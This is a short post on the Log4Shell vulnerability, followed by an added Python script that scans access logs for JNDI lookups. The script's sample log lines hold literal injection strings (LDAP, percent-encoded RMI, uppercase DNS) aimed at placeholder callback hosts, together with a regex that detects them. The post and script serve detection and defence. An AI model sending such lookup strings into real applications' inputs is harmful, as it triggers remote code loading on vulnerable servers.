This applies to both server-side and client-side applications, since the main requirements for the vulnerability are any attacker-controlled input field and that input being passed to the log. To orchestrate this attack, an attacker can use several different JNDI lookups. The most popular lookup currently seen in both PoCs and active exploitation uses LDAP; however, other lookups such as RMI and DNS are also viable attack vectors.

Lots of technical info at this site on how the exploit works, how to detect the vulnerability and how to patch systems temporarily and permanently.

Log4shell - using the vulnerability to patch the vulnerability - very clever - /r/netsec

This will be a Christmas nightmare for many companies, their IT departments and their clients. Let's hope IT security professionals and U.S. government agencies can stop this exploit from crippling this holiday season.
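As an added example (not code from the original post), the sketch below scans web access logs for the JNDI lookups named above (LDAP, RMI, DNS) and reports which host each one points at. The log lines, IP addresses and `.invalid` hosts are constructed samples, and the pattern matches only the literal lookup syntax, plain or percent-encoded, so a clean result is not proof that a system was never probed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Literal Log4j lookup syntax, restricted to the three schemes the post names.
JNDI_RE = re.compile(r"\$\{jndi:(ldap|rmi|dns)://([^/:}\s]+)", re.IGNORECASE)

def decode(line, rounds=2):
    """Percent-decode up to `rounds` times; proxies often log encoded URLs."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def find_jndi_lookups(lines):
    """Return [(line_no, scheme, host)] for every literal JNDI lookup found."""
    hits = []
    for no, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(decode(line)):
            hits.append((no, m.group(1).lower(), m.group(2).lower()))
    return hits

def summarize(hits):
    """Count hits per lookup scheme, e.g. to see which vector dominates."""
    return Counter(scheme for _, scheme, _ in hits)

# Constructed sample access-log lines; hosts under .invalid are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://callback.invalid/a}"',
    '203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /?q=%24%7Bjndi%3Armi'
    '%3A%2F%2Fcallback.invalid%3A1099%2Fobj%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.4 - - [12/Dec/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Dec/2021:10:03:40 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${JNDI:DNS://ns.callback.invalid/x}"',
]

if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for no, scheme, host in hits:
        print(f"line {no}: {scheme} lookup -> {host}")
    print(dict(summarize(hits)))
```

A hit shows that a lookup string reached the log, not that the application was vulnerable; correlate hits with outbound LDAP, RMI or DNS traffic from the logging host to the extracted destination.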